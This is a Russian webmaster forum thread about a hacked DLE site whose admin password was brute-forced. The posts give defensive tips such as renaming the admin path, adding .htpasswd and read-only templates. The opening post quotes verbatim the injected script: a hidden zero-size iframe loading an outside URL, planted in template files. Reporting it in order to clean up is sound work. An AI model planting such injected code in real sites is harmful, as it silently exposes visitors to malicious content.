Скрыть объявление
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Дыра в dle ?

Тема в разделе "Вопросы- ответы", создана пользователем Driple, 21 янв 2017.

21.01.17 в 23:25
22.01.17 в 11:26
17
1.890
0
  1. TopicStarter Overlay
    Driple

    Driple Команда форума VIP Кинотрафик v2

    Сообщения:
    369
    Симпатии:
    61
    Лучших ответов:
    0
    копался случайно на своём сайте в разделе пользователей, и случайно обнаружил, что один из пользователей зарегил себе логин user и каким то образом оказался с правами администратора. Как такое может быть? и как он это сделал? получается есть какой-то баг, ведь под админом можно сделать всё что угодно .... https://yadi.sk/i/VjFrtigQ3ADZzm
    и как себя обезопасить?
    более того начал проверять ftp клиентом, какие файлы были редактированы, оказалось чел залез в fullstory.tpl и navigation.tpl и вставил следующий код
    <script>document.write('<iframe src="http://avnt.ru/swf.php" width="0" height="0" frameborder="0"></iframe>');</script>
     
  2. TopicStarter Overlay
    Driple

    Driple Команда форума VIP Кинотрафик v2

    Сообщения:
    369
    Симпатии:
    61
    Лучших ответов:
    0
    начал разбираться дальше, чел видимо подобрал пароль к логину admin, затем создал пользователя user, зачем-то и изменил 3 файла. https://yadi.sk/i/odGrvlAM3ADiiz
    потом начал смотреть Список действий в админпанели , логин admin я давно не пользуюсь, а по нему кто то периодически логинился.
     
  3. BROKER

    BROKER Забанен

    Сообщения:
    1.560
    Симпатии:
    1.131
    Лучших ответов:
    0
    Я конечно извиняюсь и может я не прав но объясните мне пожалуйста ............. какого хуя вы вообще открываете регу ??? По моему уже отошли времена когда вебмастера выебывались своими базами зареганных людей друг перед другом, смысл от них? На всех сайтах закрыта рега и считаю что она по большому счету нахуй не кому не нужна, сейчас пользователи скотины ленивые пошли и им пальцем то лень пошевелить не то что регаться. Но даже если и зарегался юзер какая выгода и польза с этого?

    P.S. - я конечно не беру в расчет помешанных всяких людей на коллекционировании почтовых ящиков с дальнейшей рассылкой по ним с целью впарить какую нибудь хуйню :D
     
    • Нравится Нравится x 2
  4. TopicStarter Overlay
    Driple

    Driple Команда форума VIP Кинотрафик v2

    Сообщения:
    369
    Симпатии:
    61
    Лучших ответов:
    0
    @BROKER, открыл регу для постоянников, вырубил им рекламу, подумал что так будет лучше. Но они то брутили логины админа, поэтому открыта или закрыта рега уже не имеет значения
     
  5. Den

    Den Команда форума VIP Кинотрафик v2

    Сообщения:
    2.097
    Симпатии:
    980
    Лучших ответов:
    0
    спасибо за новое слово :D
     
  6. BROKER

    BROKER Забанен

    Сообщения:
    1.560
    Симпатии:
    1.131
    Лучших ответов:
    0
    Наверное открою тайну но для всяких таких уебанов нужно делать левую админку нерабочую и пусть ебутся брутят когда как рабочую нужно по другому пути прописывать, нерабочая мало того что хуй кого авторизует даже если и правильные данные введешь так еще и блочить будет как и рабочая админка.
     
  7. TopicStarter Overlay
    Driple

    Driple Команда форума VIP Кинотрафик v2

    Сообщения:
    369
    Симпатии:
    61
    Лучших ответов:
    0
    @BROKER, раскрывай дальше как её сделать, так, что бы была видимость авторизации?
     
  8. europa1988

    europa1988 Бывалый

    Сообщения:
    613
    Симпатии:
    102
    Лучших ответов:
    2
    • Нравится Нравится x 1
  9. TopicStarter Overlay
    Driple

    Driple Команда форума VIP Кинотрафик v2

    Сообщения:
    369
    Симпатии:
    61
    Лучших ответов:
    0
    проверил остальные сайты, каждые 5-10 минут, идёт попытка взлома-подбора логин-пароля. это какой-то пизнец. людям нех заняться, лучше бы бабки зарабатывали (((
     
  10. ZerocooL

    ZerocooL Команда форума Администратор VIP Кинотрафик v2

    Сообщения:
    8.805
    Симпатии:
    4.497
    Лучших ответов:
    10
    Мануалы:
    31
    там 100% добавлен код мобильной рекламы на вапклик!!!!
    чисть файлы. смотри прокрутку в право!
     
    • Нравится Нравится x 3
  11. Karburator

    Karburator Команда форума VIP Кинотрафик v2

    Сообщения:
    963
    Симпатии:
    292
    Лучших ответов:
    0
    Двиг лизензия, или нуленый/хуеленый? :D:D
     
  12. Karburator

    Karburator Команда форума VIP Кинотрафик v2

    Сообщения:
    963
    Симпатии:
    292
    Лучших ответов:
    0
    Пароль: 1111? 0000? или qwerty? М.б. просто когда-то, дал кому-то доступ и забыл сменить пассы?
     
  13. Avenger

    Avenger Бывалый

    Сообщения:
    562
    Симпатии:
    89
    Лучших ответов:
    2
    Ты палишь мои пароли...
     
    • Нравится Нравится x 3
  14. Ботяра

    Ботяра Забанен

    Сообщения:
    0
    Симпатии:
    0
    Лучших ответов:
    54
    1. Меняй путь админки.
    2. Включи авторизацию только через соцсети (ВК/ФБ... есть почти у всех).
    3. Измени 20 минут блока на 2000 минут блокировки при неверно введенных 2-3 попытках:
    4. Удали всех админов кроме себя.
    5. Поставь фейк авторизации от вордпресса по адресу admin.php
     
    • Нравится Нравится x 1
  15. TopicStarter Overlay
    Driple

    Driple Команда форума VIP Кинотрафик v2

    Сообщения:
    369
    Симпатии:
    61
    Лучших ответов:
    0
    ночью пытались снова проникнуть, но меры принял :)
    странно что один ip с которого лезут, хостинги разные были у сайтов, переехал буквально как пару дней на общий. судя по регам, до переезда уже заходили в админку. совпадение ли ...
     
  16. damir

    damir Команда форума VIP Кинотрафик v2

    Сообщения:
    2.151
    Симпатии:
    962
    Лучших ответов:
    0
    @Driple,
     
  17. TopicStarter Overlay
    Driple

    Driple Команда форума VIP Кинотрафик v2

    Сообщения:
    369
    Симпатии:
    61
    Лучших ответов:
    0
    @damir, лицензия с кейгеном
     
  18. aeneas

    aeneas Забанен

    Сообщения:
    11.450
    Симпатии:
    3.808
    Лучших ответов:
    10
    @Driple, а если так ? -
    1. вход в админку закрыть .htpasswd
    2. все файлы шаблона поставить права 444
    у меня так и гемороя пока не было тьфу тьфу

    я думаю один .htpasswd спасет от всей ебаты, тока в нем пароль ставь не 123456 )
     
    • Нравится Нравится x 1
Похожие темы
  1. LisER07
    Ответов:
    18
    Просмотров:
    2.012
Загрузка...